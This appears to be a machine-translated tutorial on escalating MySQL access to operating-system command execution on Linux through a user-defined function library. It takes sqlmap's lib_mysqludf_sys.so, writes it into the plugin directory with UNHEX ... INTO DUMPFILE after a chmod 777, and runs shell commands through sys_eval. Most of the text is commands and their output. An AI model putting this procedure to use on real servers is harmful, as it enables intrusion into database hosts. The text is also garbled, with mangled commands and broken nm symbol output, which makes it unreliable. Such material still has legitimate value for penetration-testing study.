Linux uses UDF library to realize Mysql right _mysql

Environment:
Os:linux (BT5)

Database:mysql

Briefly:
By customizing the library function to implement arbitrary programs, here only test through the Linux, specific to Windows, the use of the DLL is naturally different.

Requirements:
There must be a Func table under the MySQL library, and the UDF will be banned when the ‑‑skip‑grant‑tables is open;

Process: Get the plugin library path find the corresponding operating system UDF library file load function and execute command with UDF library file

1, get the plugin library path

Mysql> Show variables like "%plugin%";
+---------------+-----------------------+
| variable_name | Value         |
+---------------+-----------------------+
| plugin_dir |  /usr/lib/mysql/plugin
| +---------------+-----------------------+
1 row in Set (0.00 sec)

2, to find the corresponding operating system UDF library files
Because of their own testing, looked at the version of their system, 64-bit

root@bt:~# uname-a
Linux bt 3.2.6 #1 SMP Fri Feb 10:34:20 EST x86_64

For UDF files, you can have them in the Sqlmap tool, just find the version of the corresponding operating system

root@bt:/pentest/database/sqlmap/udf/mysql# LS
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/ linux# ls
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3, using the UDF library file to load functions and execute commands
First you get the hexadecimal format of the UDF library file, which you can use locally

Mysql> Select Hex (load_file ('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so ')) into outfile '/ Tmp/udf.txt ';
Query OK, 1 row affected (0.04 sec)

Because I test, the use of the account name MySQL, is not root, so the plug-in directory can not write, and in fact, the general UDF to the right to start with the root permissions of the MySQL program, so there is no directory permissions are insufficient, can not access the situation. To continue, modify directory permissions

root@bt:~# chmod 777/usr/lib/mysql/plugin

The database is written to the UDF library to the MySQL library directory:

Mysql> Select Unhex (' 7f454c46020 ... ') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so ';
Query OK, 1 row affected (0.04 sec)

&NBSP
To view the functions supported by this UDF library

root@bt:~# nm-d/usr/lib/mysql/plugin/mysqludf.so w _jv_registerclasses 0000000000201788 A __bss_start W __cxa_finalize W __gmon_start__ 0000000000201788 a _edata 0000000000201798 a _end 0000000000001178 T _fini 000 0000000000ba0 t _init u fgets u fork u free u getenv 000000000000101a t lib_mysqludf_s
         Ys_info 0000000000000da4 t lib_mysqludf_sys_info_deinit 0000000000001047 t lib_mysqludf_sys_info_init U malloc 
u mmap u pclose u popen u realloc u setenv u strcpy U-strncpy
0000000000000dac t sys_bineval 0000000000000dab t sys_bineval_deinit 0000000000000da8 t Sys_bineval_init 0000000000000e46 t sys_eval 0000000000000da7 t sys_eval_deinit 0000000000000f2e t sys_eval_init 0000000000001066 t SYS_EX EC 0000000000000da6 T sys_exec_deinit 0000000000000f57 t sys_exec_init 00000000000010f7 t Sys_get 0000000000000da5 Et_deinit 0000000000000fea T Sys_get_init
000000000000107a t sys_set 00000000000010e8 t sys_set_deinit 0000000000000f80 t sys_set_init U sysconf
 U system u waitpid

Finally, load the function and execute:

mysql> Create function Sys_eval returns string Soname "Mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
 
mysql> Select Sys_eval (' WhoAmI ');
+--------------------+
| sys_eval (' whoami ') |
+--------------------+
| mysql       |
+--------------------+
1 row in Set (0.04 sec)
 
mysql> select * from Mysql.func;
+----------+-----+-------------+----------+
| name   | ret | DL     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in Set